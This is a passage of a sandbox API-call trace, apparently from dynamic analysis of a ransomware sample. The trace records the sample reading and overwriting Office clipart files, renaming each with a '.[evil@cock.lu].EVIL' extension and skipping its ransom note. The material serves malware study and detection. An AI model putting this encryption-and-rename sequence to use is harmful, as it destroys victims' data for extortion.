lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd90, lpOverlapped=0x0) returned 1 [0150.437] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.437] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.437] _errno () returned 0x84b1160840 [0150.437] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.437] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xda0, lpOverlapped=0x0) returned 1 [0150.437] CloseHandle (hObject=0x1a8) returned 1 [0150.437] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.437] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.437] __uncaught_exception () returned 0x84b1160800 [0150.437] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.438] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187895.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187895.wmf.[evil@cock.lu].evil")) returned 1 [0150.439] ??_V@YAXPEAX@Z () returned 0x1 [0150.442] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF", dwFileAttributes=0x200) returned 0 [0150.442] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.442] wcsstr (_Str="J0187921.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.442] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF") returned 69 [0150.442] wcscmp (_String1="J0187921.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.443] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187921.WMF") returned 0x0 [0150.443] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF") returned 0x45 [0150.443] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187921.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.445] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1388, lpOverlapped=0x0) returned 1 [0150.454] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.454] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.454] _errno () returned 0x84b1160840 [0150.454] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.454] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13a0, lpOverlapped=0x0) returned 1 [0150.454] CloseHandle (hObject=0x1a8) returned 1 [0150.454] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.455] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.455] __uncaught_exception () returned 0x84b1160800 [0150.455] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.455] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187921.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187921.wmf.[evil@cock.lu].evil")) returned 1 [0150.456] ??_V@YAXPEAX@Z () returned 0x1 [0150.460] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF", dwFileAttributes=0x200) returned 0 [0150.460] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.460] wcsstr (_Str="J0188511.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.460] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF") returned 69 [0150.460] wcscmp (_String1="J0188511.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.460] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0188511.WMF") returned 0x0 [0150.460] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF") returned 0x45 [0150.460] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188511.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.462] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x29dc, lpOverlapped=0x0) returned 1 [0150.469] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.469] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.469] _errno () returned 0x84b1160840 [0150.469] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.469] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x29e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x29e0, lpOverlapped=0x0) returned 1 [0150.470] CloseHandle (hObject=0x1a8) returned 1 [0150.470] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.470] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.470] __uncaught_exception () returned 0x84b1160800 [0150.470] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.470] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188511.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188511.wmf.[evil@cock.lu].evil")) returned 1 [0150.471] ??_V@YAXPEAX@Z () returned 0x1 [0150.474] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF", dwFileAttributes=0x200) returned 0 [0150.474] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.474] wcsstr (_Str="J0188513.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.474] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF") returned 69 [0150.474] wcscmp (_String1="J0188513.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.474] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0188513.WMF") returned 0x0 [0150.474] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF") returned 0x45 [0150.474] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188513.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.476] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3004, lpOverlapped=0x0) returned 1 [0150.483] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.483] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.483] _errno () returned 0x84b1160840 [0150.483] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.483] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x3020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3020, lpOverlapped=0x0) returned 1 [0150.483] CloseHandle (hObject=0x1a8) returned 1 [0150.483] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.484] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.484] __uncaught_exception () returned 0x84b1160800 [0150.484] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.484] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188513.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188513.wmf.[evil@cock.lu].evil")) returned 1 [0150.485] ??_V@YAXPEAX@Z () returned 0x1 [0150.488] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF", dwFileAttributes=0x200) returned 0 [0150.488] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.488] wcsstr (_Str="J0188519.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.489] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF") returned 69 [0150.489] wcscmp (_String1="J0188519.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.489] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0188519.WMF") returned 0x0 [0150.489] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF") returned 0x45 [0150.489] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188519.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.491] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16c0, lpOverlapped=0x0) returned 1 [0150.499] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.499] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.499] _errno () returned 0x84b1160840 [0150.499] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.499] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16e0, lpOverlapped=0x0) returned 1 [0150.500] CloseHandle (hObject=0x1a8) returned 1 [0150.500] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.500] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.500] __uncaught_exception () returned 0x84b1160800 [0150.500] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.500] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188519.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188519.wmf.[evil@cock.lu].evil")) returned 1 [0150.501] ??_V@YAXPEAX@Z () returned 0x1 [0150.505] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF", dwFileAttributes=0x200) returned 0 [0150.505] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.505] wcsstr (_Str="J0188587.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.505] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF") returned 69 [0150.505] wcscmp (_String1="J0188587.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.505] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0188587.WMF") returned 0x0 [0150.505] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF") returned 0x45 [0150.505] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188587.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.508] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3b5c, lpOverlapped=0x0) returned 1 [0150.517] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.517] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.517] _errno () returned 0x84b1160840 [0150.517] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.517] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3b60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3b60, lpOverlapped=0x0) returned 1 [0150.517] CloseHandle (hObject=0x1a8) returned 1 [0150.517] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.517] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.517] __uncaught_exception () returned 0x84b1160800 [0150.517] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.518] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188587.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188587.wmf.[evil@cock.lu].evil")) returned 1 [0150.519] ??_V@YAXPEAX@Z () returned 0x1 [0150.522] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF", dwFileAttributes=0x200) returned 0 [0150.523] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.523] wcsstr (_Str="J0188667.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.523] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF") returned 69 [0150.523] wcscmp (_String1="J0188667.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.523] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0188667.WMF") returned 0x0 [0150.523] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF") returned 0x45 [0150.523] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188667.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.525] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3e9e, lpOverlapped=0x0) returned 1 [0150.534] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.534] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.534] _errno () returned 0x84b1160840 [0150.534] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.534] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x3ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3ea0, lpOverlapped=0x0) returned 1 [0150.534] CloseHandle (hObject=0x1a8) returned 1 [0150.534] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.535] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.535] __uncaught_exception () returned 0x84b1160800 [0150.535] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.535] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188667.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188667.wmf.[evil@cock.lu].evil")) returned 1 [0150.536] ??_V@YAXPEAX@Z () returned 0x1 [0150.539] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF", dwFileAttributes=0x200) returned 0 [0150.539] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.539] wcsstr (_Str="J0188669.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.539] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF") returned 69 [0150.539] wcscmp (_String1="J0188669.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.539] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0188669.WMF") returned 0x0 [0150.540] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF") returned 0x45 [0150.540] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188669.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.542] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x73a2, lpOverlapped=0x0) returned 1 [0150.551] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.551] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.551] _errno () returned 0x84b1160840 [0150.551] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.551] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x73c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x73c0, lpOverlapped=0x0) returned 1 [0150.551] CloseHandle (hObject=0x1a8) returned 1 [0150.551] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.552] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.552] __uncaught_exception () returned 0x84b1160800 [0150.552] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.552] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188669.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188669.wmf.[evil@cock.lu].evil")) returned 1 [0150.553] ??_V@YAXPEAX@Z () returned 0x1 [0150.556] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF", dwFileAttributes=0x200) returned 0 [0150.556] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.556] wcsstr (_Str="J0188679.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.556] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF") returned 69 [0150.556] wcscmp (_String1="J0188679.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.556] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0188679.WMF") returned 0x0 [0150.556] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF") returned 0x45 [0150.557] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188679.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.559] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x336a, lpOverlapped=0x0) returned 1 [0150.567] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.567] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.567] _errno () returned 0x84b1160840 [0150.567] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.568] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x3380, 